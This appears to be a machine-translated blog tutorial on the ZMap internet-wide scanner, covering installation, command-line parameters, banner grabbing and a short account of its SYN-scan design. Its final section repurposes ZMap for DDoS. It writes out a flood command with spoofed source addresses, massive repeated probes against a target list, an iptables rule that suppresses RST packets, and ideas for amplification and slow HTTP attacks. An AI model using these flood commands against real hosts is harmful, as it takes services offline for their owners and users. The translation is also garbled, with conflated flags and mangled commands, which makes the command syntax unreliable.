Livers, 2013/08/23 that. He
0 x00 background
Zmap is a tool developed by researchers at the University of Michigan. At the 22nd USENIX Security Symposium, it gained prominence with a scan speed 1300 times faster than NMAP. Compared to the well-known NMAP network scanning speed is its biggest bright spot. In gigabit nic state, scan for IPv4 addresses in the entire network within 45 minutes.
Installation:
The 64 – bit version
Debian/Ubuntu series
Step1: sudo apt-get install libgmp3-dev libpcap-dev gengetopt Step2: Wget https://github.com/zmap/zmap/archive/v1.0.3.tar.gz Step3: tar ZXVF - v1.0.3. Tar. Gz Step4: CD zmap 1.0.3 / SRC Step5: make && make installCopy the code
Version 32 (zmap home page only says it is suitable for 64-bit Linux, here using BT5r3 32-bit also successfully installed, it is recommended to choose the version of 64)
Debian/Ubuntu series
Step1: sudo apt-get install libgmp3-dev libpcap-dev gengetopt Step2: git clone git://github.com/zmap/zmap.git Step3: Tar -zxvf v1.0.2.tar.gz Step4: CD zmap-1.0.2/ SRC Step5: make && make installCopy the code
Fedora, Red Hat Enterprise Linux, or CentOS
Just replace step2 with
sudo yum install gmp gmp-devel libpcap-devel gengetopt
Copy the code
If you want to use redis for storage, you need to install Hiredis first and in step5
Make REDIS=true (add this setup option)Copy the code
If you are not running as root, you need to configure:
setcap cap_net_raw=ep /usr/local/sbin/zmap
Copy the code
0x01 Introduction to Use:
After installation, you can call Zmap directly
1. Simplest call
zmap -B 10M -p 80 -n 100000 -o results.txt
Copy the code
-b refers to the bandwidth -p port -n How many targets are scanned -o output results
The entire sentence indicates that the 10M bandwidth is used to scan ports at the 100000IP address and output the results to results.txt.
When I test BT5 R3, I have to add the -g parameter
zmap -B 10M -p 80 -n 100000 -G "01:00:5e:00:00:02" -o results.txt
Copy the code
-g is the MAC address of the specified egress. It must be the actual MAC address of the gateway. Otherwise, the information cannot be found in the returned data.
If port 80 is scanned for the IP address, it is saved in the following format.
115.237.116.119
23.9.117.80
207.118.204.141
217.120.143.111
Copy the code
2. The most used command
zmap -p 443 -G "00:00:00:00:00:00"
Copy the code
Several ZMAP research projects are involved in detecting SSL/STL usage across the network. 
It can be seen that the scanning of the whole network obtained by me is about 9 hours and 16 minutes. The network is 10MADSL bandwidth, and the ADSL uplink speed is only about 100K, resulting in time double delay.
3. Common parameters
-p, --target-port=port
Copy the code
Specify the destination port for scanning
-o, --output-file=name
Copy the code
Write the result to the specified file -o result.txt
-b, --blacklist-file=path
Copy the code
For example, 192.168.0.0/16 indicates that 192.168.x.x will not be scanned. By default, a copy of RFC 1918 reserved and Intranet addresses is provided for reference and stored in conf/blacklist.conf
zmap -p 443 -G "00:00:00:00:00:00" -b conf/blacklist.conf
-n, --max-targets=n
Copy the code
Maximum number of SCANNED IP addresses. -n 100 indicates that 100 IP addresses are scanned. You can also specify the -n 0.1% format to scan 0.1% of the IP addresses on the entire network segment in the blacklist.
-N, --max-results=n
Copy the code
Maximum number of scanned IP addresses. -n 100 indicates that the system stops when 100 scanned results exist.
-t, --max-runtime=secs
Copy the code
Maximum scanning time. -T 10 indicates that the program finishes for 10s.
-r, --rate=pps
Copy the code
Set the number of packets sent per second. – r 10000 indicates that 10k packets are sent per second.
-B, --bandwidth=bps
Copy the code
-b 10M indicates the size of packets sent per second. -b 10M indicates 10 Mbit/s (GMK).
-c, --cooldown-time=secs
Copy the code
Set how long it takes to receive data (response) after the packet is sent. The default is 8s. TCP connections receive data asynchronously.
-e, --seed=n
Copy the code
Set the order of scanning random addresses, pseudo random seeds in C language, specify the fixed value of each random scanning IP address order is the same.
-T, --sender-threads=n
Copy the code
Set the scan thread. The default value is 1. After testing, single thread basically makes full use of network bandwidth.
-P, --probes=n
Copy the code
Set the number of packets to be sent to each IP address. Default is 1. (One of the DDOS parameters).
-d, --dryrun
Copy the code
Print out the contents of each package, very useful function.
-s, --source-port=port|range
Copy the code
Set the source port for scanning. The value ranges from -s 30,000-50000. (One of the DDOS parameters).
-S, --source-ip=ip|range
Copy the code
Set the source IP address for scanning. The range can be -s 100.100.0.1-200.200.200.200 (one of the DDOS parameters).
-G, --gateway-mac=addr
Copy the code
Set the MAC address of the gateway, which can be forged. (One of the DDOS parameters)
-M, --probe-module=name
Copy the code
Tcp_synscan (default), ICmp_echoscan (ping scan), udp (test speed is lower than the first two). You can customize your own module. ZMAP author will add options such as user-defined UDP payload later. (‘ *udp_send_msg = “GET/HTTP/1.1
“; // terminated ‘Must be null-terminated’) the source code cannot be changed directly.
-O, --output-module=name
Copy the code
Set the result output module with parameters simple_file (default), extended_file.
The Simple_file mode is as follows
115.237.116.119
23.9.117.80
207.118.204.141
217.120.143.111
Copy the code
The Extended File mode is as follows
Response, Saddr, DADDR, sport, dport, seq, ACK, in_cooldown, is_repeat, timestamp Synack, 159.174.153.144, 10.0.0.9, 80, 40555, 3050964427, 3515084203, 0, 0,2013-08-15 18:55:47.681Copy the code
Both the scan module and the output module provide apis to add functionality as needed.
--quiet
Copy the code
Run in quiet state without printing progress information to the screen
--summary
Copy the code
Output summary results, very helpful to researchers.
0x02 Three additional extension applications
Banner Grab
Grab a fingerprint, in short grab a response in preparation for identifying information like SSH, HTTP 401, etc.
Here is examples/banner-grab directory
First make generates banner-grab-tcp
Write data to be sent to an HTTP-req file (you can also customize sSH-req and the like)
Such as:
Echo -e -n "GET/HTTP/1.1 Host: %s "> http-reqCopy the code
(%s reserved, other HTTP request can be constructed arbitrarily, including GET, POST)
This extends the parameter under banner-grab-tcp
-c, --concurent The number of connections each time, preferably less than 1000, Set ulimit-ssn 1000000 'and' ulimit-shn 1000000 'to the maximum number of processes per file 1024 -p, --port Connected port -t, --conn-timeout Connection timeout duration -r, --read-timeout Response timeout duration -v, --verbosity Column fetch details, similar to SQLmap -f, --format Output file format hex, ASCII, Base64-d, --data Sends the data information that is set above http-reQCopy the code
#define MAX_BANNER_LEN 1024 (MAX_BANNER_LEN 1024)
Used in conjunction with ZMAP
example
zmap -p 80 -N 1000 -o - | ./banner-grab-tcp -p 80 -c 100 -d http-req > http-banners.out
Copy the code
Zmap scans 1000 open IP addresses of port 80. Banner-grab-tcp scans these IP addresses. The content of scanning requests can be customized through HTTP-req.
forge-socket
As with the Banner Grab function, the parameters are similar and will not be repeated.
The main reason is that the installation is different
The following drivers must be installed first
git clone [email protected]Git CD forge_socket make sudo insmod forge_socket.ko :ewust/forge_socket.git CD forge_socket make sudo insmod forge_socket.koCopy the code
And use iptables to prevent RST packets from being sent
iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
Copy the code
UDP Data Probes
Version 1.03 added
For details about test payload, see Payload
Github.com/zmap/zmap/t…
Take port 1434 of the MSSQL as an example:
zmap -M udp -p 1434 --probe-args=file:examples/udp-probes/mssql_1434.pkt
Copy the code
PKT can also be constructed on its own.
Formatting configuration
Simplify command line input with configuration files
Interface "eth1" source-ip 1.1.1.4-1.1.1.8 gateway-mac b4:23: f09:28 :fa:2d # upstream gateway cooldown-time 300 # seconds blacklist-file /etc/zmap/blacklist.conf output-file ~/zmap-output quiet summaryCopy the code
The above instructions are all described above.
Obviously, zMap can be configured more quickly through configuration files.
Usage:
zmap --config=~/.zmap.conf --target-port=443
Copy the code
0x03 Principle Analysis
Know it
Let’s start with the TCP three-way handshake.
In THE TCP/IP protocol, TCP provides reliable connection service, using the three-way handshake to establish a connection.
It can be seen that the three-way handshake exists in the sense-response-send mechanism, and the waiting time inevitably leads to slow packet sending.
Zmap sends SYN, then RST (resetting the connection), no listening synchronization operation, empties the connection, and continues to send the next packet. For zMAP, Ip addresses and ports are mapped in a hash table. When a packet returns (Syn+Ack or RST), the Ip address and port address in the returned packet are queried in the hash table and recorded accordingly. The basic reason of high efficiency of synchronous mutation step.
0x04 Divergent Expansion
Availability of DDoS:
The author aims to focus on scanning the entire network and does not mention information about DDoS.
Nor does it specifically provide instructions for point-to-send packets.
The following discussion may be contrary to the author’s idea, I hope you focus on technical research, not some malicious sabotage.
Specify the IP segment and IP address
-w, --whitelist-file=path
Copy the code
Restrict scanning to only the following addresses or address segments in a file, for example:
222.222.221.82/24 (192.168.1.0-255) (Available seed - seed adjustment from which IP)Copy the code
Single Ip address
222.222.221.82/32 (a random one is found, where version 1.02 cannot be tested directly. You need to change a small part of the root node of the binary tree that generates IP addresses in blacklist.c and constraint.Copy the code
Then use
-p 10000000 (repeated packet sending) -s 2000-60000 (set a large port segment) -s 20.20.20.0-200.200.200.200 (random large number of Ip addresses, Zmap -p 80 -p 10000000-s 2000-60000-s 20.20.20.0-200.200.200.200 -w attackurl.txtCopy the code
See the following data sent to effect as expected
What kind of harm might be caused?
You can configure IP Spoofing, SYN flood,land attack, ICMP Floods, Application Floods, and UDP all-zero attacks.
Zmap sends packets at a speed that even ignores the RST packets that follow.
You can also do it perfectly by using iptables
iptables -A OUTPUT -p tcp -m tcp --tcp-flags RST,RST RST,RST -j DROP
Copy the code
Drop sent RST packets.
Can we go up a little bit?
After all, there are some extensions that can be controlled to the application layer and also slow attack.
Get the type
Echo -e -n "GET/HTTP/1.1 Host: %s "> http-req is replaced with echo -e -n "GET/HTTP/1.1 Host: %s" > http-reqCopy the code
Post type
Sizeof (value) can be set to a large dynamic value. The Post data setting is small.
DDoS traffic + Number of connections + Malformed packets
Basic flow can only be hard, spell hardware.
Zmap almost maximizes network bandwidth, 10 G port servers will not lose much, if you use DNS to amplify traffic and so on, horrible numbers.
Ps:
Zmap is similar to Python’s scapy in some respects.
However, zmap pure C implementation is more efficient than SCAPY.
I used to have a problem with scapy sending RST afterwards, but using iptables is a good idea.
Refer to the source code and relatively standard API interface, write some modules can play a lot of tricks.
LINK:
Zmap. IO/documentati…
github.com/zmap/